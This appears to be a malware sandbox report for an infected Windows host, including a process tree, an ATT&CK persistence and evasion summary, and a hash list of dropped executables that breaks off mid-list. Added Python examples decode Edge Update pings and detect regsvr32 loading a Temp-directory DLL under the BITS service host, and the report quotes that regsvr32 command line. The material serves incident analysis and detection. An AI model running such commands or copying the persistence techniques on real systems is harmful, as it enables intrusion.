    C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{528C72E1-A829-462C-9B13-5FC18B3158E0}\EDGEMITMP_01213.tmp\setup.exe  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{528C72E1-A829-462C-9B13-5FC18B3158E0}\EDGEMITMP_01213.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{528C72E1-A829-462C-9B13-5FC18B3158E0}\EDGEMITMP_01213.tmp\MSEDGE.PACKED.7Z" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
      - Adds Run key to start application
      - Drops file in Program Files directory
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping 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-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTUzLjQ3IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNocm9tZXJlYzM9MjAyMTQzUiIgaW5zdGFsbGFnZT0iNzgiIGNvaG9ydD0icnJmQDAuMDkiPjx1cGRhdGVjaGVjay8-PHBpbmcgcmQ9IjU0MDgiIHBpbmdfZnJlc2huZXNzPSJ7RDI5QzRBMUQtODdFQy00MzBFLUExODEtM0UwQzA3OUE4NjgzfSIvPjwvYXBwPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSI5Mi4wLjkwMi42MiIgbmV4dHZlcnNpb249Ijk0LjAuOTkyLjUwIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMjc5MzkzNjU2MTU2ODc1Ij48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9mYWVmYWU3NS03ZGRkLTRmMTEtYTQwYi04MDcwMmVhOTExYjE_UDE9MTYzNTUyNDkzNSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1lWHpkdWZ1QTVHV2NsVjJhJTJiMm8zWE50NEdxWDJRMEpTN21DNUg2ZUZyMVlkUlB1Y1BVdkxhRDBkdjlVRWxPVndLJTJiVnYzZ0RPdVpQUlZHdjBBQjd2aFElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSI5Ii8-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-PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY2MDgiIHNvdXJjZV91cmxfaW5kZXg9I
jAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSIzNDkiIGRvd25sb2FkX3RpbWVfbXM9IjE1MTE3IiBkb3dubG9hZGVkPSIxMDk5MDQ4MDAiIHRvdGFsPSIxMDk5MDQ4MDAiIHBhY2thZ2VfY2FjaGVfcmVzdWx0PSIwIiBpbnN0YWxsX3RpbWVfbXM9IjQ2NzU0Ii8-PHBpbmcgYWN0aXZlPSIwIiByZD0iNTQwOCIgcGluZ19mcmVzaG5lc3M9IntEQTRGNDQyOS02MTc1LTRGMjQtODJDQy1EMUUzODYzNEI3NDN9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjkyLjAuOTAyLjYyIiBuZXh0dmVyc2lvbj0iOTQuMC45OTIuNTAiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgY29ob3J0PSJycmZAMC40MiIgbGFzdF9sYXVuY2hfdGltZT0iMTMyNzE3NDU5MTUwODk1NjIiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-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⤵
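The long /ping arguments on the MicrosoftEdgeUpdate.exe entries above are not obfuscation: the Edge update client reports to its server in the Omaha protocol, and the XML body is sent base64url-encoded (the RFC 4648 section 5 alphabet, '-' and '_' instead of '+' and '/', padding stripped), which is why the strings contain '-' and end without '='. The decoder below is an added example, not part of the sandbox output; the 200-character fragment it decodes is copied verbatim from the first /ping command line above (a slice from the middle of the payload, starting on a 4-character boundary), and the function names are this example's own.

```python
"""Decode the base64url body of a MicrosoftEdgeUpdate.exe /ping argument.

Added example, not sandbox output. The fragment below is a verbatim slice of
the /ping command line in the process tree; decoding it shows the Omaha
<updatecheck/> and <event .../> elements, which is the quickest way to tell
this noise apart from an attacker-supplied encoded payload.
"""
import base64
import re

# Copied from the report's first /ping argument (middle of the payload,
# cut on a 4-character boundary so it decodes on its own).
PING_FRAGMENT = (
    "PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSIxMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29k"
    "ZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEzIiBldmVudHJlc3VsdD0iMSIg"
    "ZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-"
)


def decode_base64url(data: str) -> bytes:
    """Decode a padding-stripped base64url string (Omaha pings omit '=')."""
    data = data.strip()
    # Restore padding: base64 input length must be a multiple of 4.
    data += "=" * (-len(data) % 4)
    return base64.urlsafe_b64decode(data)


def decode_ping(fragment: str) -> str:
    """Decode a /ping fragment to text; undecodable bytes are replaced."""
    return decode_base64url(fragment).decode("utf-8", errors="replace")


def ping_events(xml_text: str) -> list:
    """Attributes of every <event .../> element, as one dict per event.

    A real XML parser is avoided on purpose: a slice taken from the middle
    of a ping is not a well-formed document, but the elements themselves are
    regular enough for a pattern match.
    """
    events = []
    for m in re.finditer(r"<event\s+([^>]*?)/>", xml_text):
        events.append(dict(re.findall(r'(\w+)="([^"]*)"', m.group(1))))
    return events


def looks_like_omaha_ping(xml_text: str) -> bool:
    """Cheap triage check: Omaha pings carry <updatecheck/> plus <event .../>."""
    return "<updatecheck/>" in xml_text and bool(ping_events(xml_text))


if __name__ == "__main__":
    xml = decode_ping(PING_FRAGMENT)
    print(xml)
    for ev in ping_events(xml):
        print(ev)
```

The same decoder applies to any slice of the other /ping arguments as long as the slice starts on a 4-character boundary; a slice cut elsewhere still decodes, but its first few bytes come out shifted and should be ignored.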
-
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\4BB3.dll (tree level 1)
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS (tree level 1)
-
C:\Windows\system32\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\4BB3.dll" (tree level 2)
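The two regsvr32 entries above are the part of this tree a responder should turn into a detection: regsvr32 silently (/s) registering a DLL dropped in the user's Temp directory, once as a root-level process flagged "Suspicious use of NtCreateUserProcessOtherParentProcess" (created with a parent handle that is not the caller's, so the recorded parent cannot be trusted) and once as a child of the svchost instance hosting the BITS service. The following is an added example, not the sandbox's own logic. The three events are constructed from the command lines above plus one benign control; the parent of the first regsvr32 is an assumption, since the report only says its real parent was not the recorded one; and the field names are this example's own rather than the sandbox's schema.

```python
"""Flag regsvr32 loading a DLL from a user Temp directory, and children of
the BITS service host, in process-creation events.

Added example; not the sandbox's own detection logic. Sample events are
constructed from the report's command lines. The parent of the first
regsvr32 is assumed (the report records only that it was created with a
parent other than the caller), and the field layout is this example's own.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str
    cmdline: str
    parent_image: str
    parent_cmdline: str


# A path under <drive>:\Users\<name>\AppData\Local\Temp\
TEMP_DIR_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
# svchost hosting the BITS service: "svchost.exe -k netsvcs -p -s BITS"
BITS_SVCHOST_RE = re.compile(r"svchost\.exe.*\s-s\s+BITS\b", re.IGNORECASE)
# First .dll argument on the command line, quoted or bare
DLL_ARG_RE = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)\b', re.IGNORECASE)


def dll_argument(cmdline: str):
    """Return the DLL path passed on a regsvr32 command line, or None."""
    m = DLL_ARG_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def assess(ev: ProcEvent) -> list:
    """Reasons this event is suspicious; an empty list means no hit."""
    reasons = []
    image_name = ev.image.rsplit("\\", 1)[-1].lower()
    dll = dll_argument(ev.cmdline)
    if image_name == "regsvr32.exe" and dll and TEMP_DIR_RE.search(dll):
        reasons.append("regsvr32 registering a DLL from a user Temp directory")
    if BITS_SVCHOST_RE.search(ev.parent_cmdline):
        reasons.append("spawned by the BITS service host (svchost -s BITS)")
    return reasons


def find_suspicious(events) -> list:
    """(index, reasons) for every event that trips at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        reasons = assess(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample: the report's two regsvr32 launches plus a benign
# control. The parent of the first event is assumed; because that process
# was created with a spoofed parent handle, the recorded parent is whatever
# the dropper chose, which is why the Temp-DLL rule must not rely on it.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\system32\regsvr32.exe",
        cmdline=r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\4BB3.dll",
        parent_image=r"C:\Windows\explorer.exe",    # assumed (spoofed parent)
        parent_cmdline=r"C:\Windows\explorer.exe",  # assumed
    ),
    ProcEvent(
        image=r"C:\Windows\system32\regsvr32.exe",
        cmdline=r'regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\4BB3.dll"',
        parent_image=r"C:\Windows\System32\svchost.exe",
        parent_cmdline=r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS",
    ),
    ProcEvent(  # benign control: installer registering a component from Program Files
        image=r"C:\Windows\system32\regsvr32.exe",
        cmdline=r'regsvr32 /s "C:\Program Files\Example\component.dll"',
        parent_image=r"C:\Windows\System32\msiexec.exe",
        parent_cmdline=r"C:\Windows\System32\msiexec.exe /V",
    ),
]


if __name__ == "__main__":
    for idx, reasons in find_suspicious(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].cmdline)
        for r in reasons:
            print("   ", r)
```

The first event trips only the Temp-DLL rule and the second trips both, which is the point of keeping the two rules independent: parent-based logic alone would have missed the root-level launch whose parent was spoofed, while the BITS rule on its own catches the persistence path that the "BITS Jobs" entries in the ATT&CK matrix below refer to.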
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (4)
- Browser Extensions (1)
- Scheduled Task (1)
- BITS Jobs (1)
Defense Evasion
- Modify Registry (8)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (2)
- BITS Jobs (1)
- Install Root Certificate (1)
Downloads
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
MD5 17f6f3213a5a5d2fb1ef8793081c5ddd
SHA1 4601bd223fd7c52b12bc186ec9a0eb94167aaebb
SHA256 6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994
SHA512 b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe
MD5 07e143efd03815a3b8c8b90e7e5776f0
SHA1 077314efef70cef8f43eeba7f1b8ba0e5e5dedc9
SHA256 32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149
SHA512 79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe
MD5 a41adbdafc72a86a7a74c494659954b4
SHA1 d43696a0e3704a141fc0cf6a1098525c00ce882f
SHA256 d6d48be25063b05a78a013810ef21ed4a64a2122f91fadcbaf609dee8cce6f7e
SHA512 44a1bd50cf1bed0ef1adaf7839ae8549c752b9825f542daa51730019f8f3186af0c12621789668e8a083625b90680d804d8a7a7de8f46da2df5cb7550afd45d2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5 7f5a1d94e9974c0f88e556e17a5caaea
SHA1 9426565e3340173c7b613495b1458f2d1935ab78
SHA256 955d175aa1e860c0e71ecf6099af28db352adc1c8a2619795cfdffe3d895eeef
SHA512 767489777c3e7227b3440f410542f9b7f57c9cee7db26bee4a1636f6eb7ede3ea3a262361fedcca189becf508be38233fe4309d696ee842a3ef43b018d017c84
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5 462113bd69944c8c85efd89d9a025bb7
SHA1 9814f10278aaf591c1a9cca048f5d0852ccb49b5
SHA256 99271ddb708cb3b2979f5e5a6dd15920ce9774b4d8fa498f88b62157a4301dfa
SHA512 a48ce775ff92f23f91f51f7406a4fc87cf34c3b804c6bb004debfb37c6a80a82189253ae3ab75cfbb8e861a8820c08812a2d0e384ad1ee5c26dc166c7f0b443d
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\5A2E.bat
MD5 2d9b2c3adbbf6e9bebb11da8552e6e79
SHA1 524c2f633e3c6a2fb0a7bed5e2ca7be196478ad4
SHA256 03766ebc2782bdc0c1182fe2c679d33c06cf20acfd0efce9359a02988b51621f
SHA512 b3f3c85a7e7d87f3e13eccabe3511f736afc69db912326d8491d2f36d4e688a0f231b07df3421fbc7eabe9f27c33341c19424bc70da989437211b2172edbd988
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe
MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\build.exe
MD5 eafba1017e94765780d8a5b182d4c325
SHA1 7968d32aa44d2c66dc670841d86ef8dba376128f
SHA256 0d50080d7267c71894ccfd698c1ef6369cf2b1b182f903c6b8cbab8e1fb524e3
SHA512 31ff0f70cafc20e71cbe4e574b4c1460dbb77e85815339bbe191b41c771da1faa201f5fc95ab10a9b8e707df590431060e7c9d7cb8c15bd275523e1d78be2aaa
-
C:\Users\Admin\AppData\Local\Temp\is-35PMH.tmp\idp.dll
MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35
-
C:\Users\Admin\AppData\Local\Temp\is-37ELN.tmp\Ws4KoXUYMhJwpZIH_OOJR6K8.tmp
MD5 89b035e6a5fd0db09a26338bb5af5ff1
SHA1 9a784d145a596c69578625fd1793d65592d740de
SHA256 f1f90b6ffab442821650618d48117fe861d19a783a862d86941e6477a5b26173
SHA512 31d2ba520080348ffa2695308dc5e01696b32598b2c525cd745eee429e302617fd8c5d566eed8b627816671898b0783670885a4a63b22c8be56cc343457fefc6
-
C:\Users\Admin\AppData\Local\Temp\nsp7845.tmp\INetC.dll
MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47
-
C:\Users\Admin\AppData\Local\Temp\nsp7845.tmp\System.dll
MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
C:\Users\Admin\AppData\Roaming\6780841.exe
MD5 665db314ea52d4331c8f0dd49cc0c9e5
SHA1 65fc408b35d057bad6c55ea7d06edbd5001bdcc1
SHA256 dd43e6de713f9b199855a8d101069560121223bd5c5cea999a80a96bd84f4b4a
SHA512 6b1d41db7e50c32f01c2b4d5b3851adc37816fcf8d8b3cbcb0f2602d3a10652a82a9376379bb437439d29292d6a48e6c0ae785a7fda93d2b604c84d3293068fc
-
C:\Users\Admin\Documents\G3yhd3bJJbP04w8gmz860v7W.exe
MD5 7c53b803484c308fa9e64a81afba9608
SHA1 f5c658a76eee69bb97b0c10425588c4c0671fcbc
SHA256 a0914ae7b12a78738b47a8c48b844db99ceb902b835274500eb07101cce540f0
SHA512 5ee38abde2a0e0d419806b21f7b5a2807c27a210b863999ea5e1e5f8785cd24e53d7cae4f13727eb2304e71a85f7cc544029f67eb7eff2e1ed9634105ba9cb11
-
C:\Users\Admin\Pictures\Adobe Films\0MCyp39H8AxiYTlGcyBfNoUC.exe
MD5 0315428681799f2d2c4d89797c254848
SHA1 25821f5deb5dda507cd4548de47097276eb42154
SHA256 dc8622ea36b34e19125eeb63b6c15de9a95c7c19067cd746e938f06352d11489
SHA512 f604cbe4a3af0cda6e5bc47d621742b32c7fe571bbde1c2486c595b713cfb6764f93be650e2007bc6231d7fba10ad93bdc2ba353e165c4472b23882aa42b3699
-
C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe
MD5 b99a438bb5300f4aee538098b882cdf8
SHA1 560f538147a4ca5e6bfeadb3ef48ccde7070120c
SHA256 89c098f195e0becb85dbdba2a1f03a2a69081dc6c6364c3c0d4cef5cafc5bab2
SHA512 4ef448045f7e16cacf9ec86a70b9be823f766386bd10b2d0550d1d49a21a0a60907a9c3d8c2bbd2dc87024789d6da28f45cd018d7e52623791eccde9f6a21f84
-
C:\Users\Admin\Pictures\Adobe Films\5VZS13s3WByVbE4ADMVZQJD5.exe
MD5 09053a35b18ce029e4265a35d2973ba6
SHA1 a26d5b385982a84a8bd27448e73fed169f6a9721
SHA256 3df695d38bbf1000bf8ba91c514b7501c893603d0834e7d7873b4773296b459c
SHA512 e13d6f5167cb552f366612f0b210c6e0eb8f12b0f20c68851b66497ae40d5c6e62efca00fd2bc6fda0f3b1d5e86a1c825bef55c20af0ca9d49564d1d0f88c476
-
C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe
MD5 111921dab57b38ff11ef6308ce0bf30c
SHA1 0104ecaeb9bea11d3fdbec73063514707cc48ea7
SHA256 2b4151a76676f841aeb025d113ceda5d0490bfbf6616cbcf101c7e299cbcb5f2
SHA512 d5ae8f1980011ce3b45922ebbdca88f37de7a2ac089de11e50bad235530f96bedb6234f7c5aa32f13a60a29ce7f841f76957119aca615909df6fa453da5a8392
-
C:\Users\Admin\Pictures\Adobe Films\D9dd_RETOj4JIUabpjwAT2fp.exe
MD5 19b0bf2bb132231de9dd08f8761c5998
SHA1 a08a73f6fa211061d6defc14bc8fec6ada2166c4
SHA256 ef2a03f03f9748effd79d71d7684347792f9748b7bbb18843bd382570e4d332e
SHA512 5bbf211c2b0500903e07e8b460cae5e6085a14bdf2940221502d123bd448fa01dd14518cfef03a967f10b0edbd5778b5deb7141d4c6c168fc1e34aba9f96ffa1
-
C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe
MD5 4347a842af3252cc04bd521de0d4c88d
SHA1 80714a2e5c326bc891896bb4361793216d05d0d9
SHA256 6363e1be1d410cbbd95406a537dc6faf70ce5ae349f5e157f96077eddfe09f51
SHA512 f41b56949068409adb4894a96078727db696399267f422454da4dc2afdad3ff4b137aef2446b968e441e6346c71a2572ffdb3fc544b2cfa3a6c1e2c0c2773c0d
-
C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe
MD5 88e7c04b4887390be7d9656b21d23310
SHA1 5739a63511408ec7fca3ae6333b50a2d6daec7e3
SHA256 7b851bb33b2ef4ab9f89d93adf6da868fc62560c3db7f594cee8ccdc482eb7e5
SHA512 b22d3b6594344ef82582916b4d3a87456ea12a0eedb82201e47593002edaffe1373259a3cb6da9d12c008c849f5f0fd84bcc343747aa8679cde642ea7820d99c
-
C:\Users\Admin\Pictures\Adobe Films\KzQ4K19_9XrJ2mdTwpnysCw4.exe
MD5 06c71dd63c7dc7a5ed008aa01707aff0
SHA1 846644bffe9a0aab4b1e3563821302ade309ca4e
SHA256 fa3c5a7355e97874c0b5d37747e5a9bac5b38006850e2742461a711fae4c51fa
SHA512 02164fcf014a61d2df41b74806614daf9067ef0072f857ea00e8f4863e5b4770a0ee3689ec92e3151acf15f5935028ace07c3d7d5afe06463cd1245b3f2d8133
-
C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe
MD5 04571dd226f182ab814881b6eaaf8b00
SHA1 9bbb1cefd052ae602354f3f4b5a2484f31b06f37
SHA256 3a77893efb476ec95d3e340cf5b98f1bf39c77a4064be7c39475ef9ebd3aed1c
SHA512 4dba92ebc85d5553a11b749fa8147f233c1ab7cd04256d3fd1fed17126cc338a93fa64f1ec807d3eb75f6958a5555c8f9078c0b8ed7c090278a03e7fbe06eb06
-
C:\Users\Admin\Pictures\Adobe Films\Vo5pWC9v4LM4GIuQjsgwgSyb.exe
MD5 59166ec37547db252a7d5b25379be63a
SHA1 805941bf2b79971c8c0086f8cb7a57276d1d5fda
SHA256 1fdfc7afe7abb3c36f09e30bc0b248a6b1cf3b76ddf2bc1a3c4a3826fd3a916e
SHA512 bb95599190bb1ed86b78dc229e34da107cccedb0fa04f860d8455cd26a39bd8c8b82b01ac725a035d83c3e9709bea95f025c8eccfbfc6ae197318309ef6806d7
-
C:\Users\Admin\Pictures\Adobe Films\Ws4KoXUYMhJwpZIH_OOJR6K8.exe
MD5 cb6f0a5bfc40395f58844714615459ae
SHA1 86a3888444fdbaa719fe721bd57834a7d6ce1b00
SHA256 03116e2c133a0b24e6e170e6050a2fb341cba851d6bad9df8c0efcaa1e4546f8
SHA512 fff949543a2f9865d426fc672d3f31be8932c819bcf854dcab7cf6ebc212b4d59e54bbb1de7268b13001d9a565542729c8ee641fa19ac56d4d1d73bde21c2f6f
-
C:\Users\Admin\Pictures\Adobe Films\XBgLhb2BNUFW643gBLl6EQvv.exe
MD5 0eb7bedd631c3107c5f65c109ac8bf2e
SHA1 8d83f0286f73481b2eca565bf31395fb0db3f54c
SHA256 46cdd551cb300258b19545c99396a4f854d1992cb3c46ff0da62a74dbb260635
SHA512 75c443d811a7e75f96607a440dcc1c51cf158a5505de5a1453e4723a2bf9b18778119a14a3f4b9d63b9c93ea43da0a6f620414e9fff92fd889b48db404b6ed09
-
C:\Users\Admin\Pictures\Adobe Films\XQXdH_5JuxvMmlvSZF2UGNpF.exe
MD5 ca9086de3f408d228e80d70078b92daa
SHA1 efb3169c11d03008d928e8b0b337a0f586abeaca
SHA256 92f6a6f2bac6d00837a05c422753c4bbf525842bbb30b4e5a1878f58e4752ac9
SHA512 95e675cb0aac1087e930904000c88f2214c79f765ccfe8831b2af572a8ce0282d1d15b677fc6892ae6e6f8604db78d13833e2357d896f969a0af43c6935927e8
-
C:\Users\Admin\Pictures\Adobe Films\ZPIklAxPB6jR82sYubVd1wws.exe
MD5 18072775678092c74cb362a3ac7dc7de
SHA1 5b2d731d7dbd59f4512807c273cea23e09c7f195
SHA256 2932ffbdc56db8c83bbbafc1837e53518639c055c10e2d244afb1c21bc07d399
SHA512 3420b4e86caf33a0540f05413d60a16f9ce4856257a0c4bae91e3f8c80529c2bd9c7f250e286c6e469da552fcc8f1ee8f1caede7b323597387da6dec2de2dce0
-
C:\Users\Admin\Pictures\Adobe Films\_HVkO6KridfpAFsxSd4xBRC_.exe
MD5 209b43f1d7512c9a7c329272b3a65133
SHA1 1c317f95764c4647b204f1c36a6e338b0f7b0433
SHA256 de673d460f4c2fc1d4e45fe4e7d5107b67ffacc6d05aba05e466d73ecec71e4e
SHA512 a8568c3b49489098b49bbc6ef1f025fbcb0a4b29d6d8a8c74ec423f65ac84fc32debf2d96c2a9e56e4d0c6088ab5bd095a8bb9444acf2b23d14583367a7ef7ec
-
C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe
MD5 4c9c82670770948a3e163975e0955b01
SHA1 5ff0a90750a43a44c7e46fd8cf115cff321fde70
SHA256 464281e1d920f24939cb8d70f841dc397ebce865208ec2140977a245d77733b8
SHA512 5882e79dd0012ab63e32cad565bcdd1b067341d2014b1e2a8f066e13e5a895dfaf58a1e24e48d5e1b149bd12617eede514d1315259de3797d4ee81beda744285
-
C:\Users\Admin\Pictures\Adobe Films\dcXxD_mTLuOWLK7yvm0uWiKh.exe
MD5 a76fd400de9e2250914e7755a746e1d8
SHA1 71ce07d982de35ccd4128cce9999e9ae53f4bc0f
SHA256 e5b763f6d2719da30634842c924f516f7090e68330fe561b79c813eacd2d7584
SHA512 c6876962a5425fad196f29efbb7c9f629099f0794b2b79f590a0af6865c89bcd1c2c5282d2710ba8f3866fb9cab364f2ede7f28b484e90d1508a7dce19c5b7da
-
C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe
MD5 dafa941a30e4da68249ef7e5477ba2ec
SHA1 7c893cd3d2df5387f4095d06e7903f65deca92ea
SHA256 a8310f7d361e090f03ce31ceda299125ccfc430a7ebd829529e01e98c9cdbfe3
SHA512 4f7df1166d4dd26ad810b55022e893d0b5662adcdf12d076e1fec8983387f9be1b7a8ac6a486a64e7ecbc226406bbeaafe27c1ff57143aa65d4d7cc91478dad3
-
C:\Users\Admin\Pictures\Adobe Films\iWl5YE6jVqxWhmGtApNhDm2L.exe
MD5 d085cc4e29f199f1b5190da42a2b35c5
SHA1 955a2b2e2ce20b1b83c2e58bb5da80f4bb716170
SHA256 51cd406f76b0ee6c71563b3e7c5405e2f041cff07615a3ece425b692a9591b4d
SHA512 379d93c149aed40723ec2d4f2225a8239686afe25c79835e07fa1f9792f7fb4847eda329bf5f9a453ca27fa02874d4b4df980b05212f87d3a47ddc0b90e19dae
-
C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe
MD5 5dd4e67596ad5d9c996883be5b01c809
SHA1 50ac90a728693b3f91ada905be1acbd3be85f6cf
SHA256 6d5ab7f15b564571f112ac2bde7ef2a387709c0576dff84071843d451ef4b8e2
SHA512 4aa730c2363117802f99c974b158f606be11a3a3b8663f60510bc6cecf935381c6f55c7e74d801af5a90e4acb064319432c337f0f69bb923432041c258a1d668
-
C:\Users\Admin\Pictures\Adobe Films\nGKKAdD43ozQJDv8K6QWTxN0.exe
MD5 e6795550a2331bf2b0b5b46718b79c70
SHA1 d661fc34830e2445fb430fd109997deab866aaf5
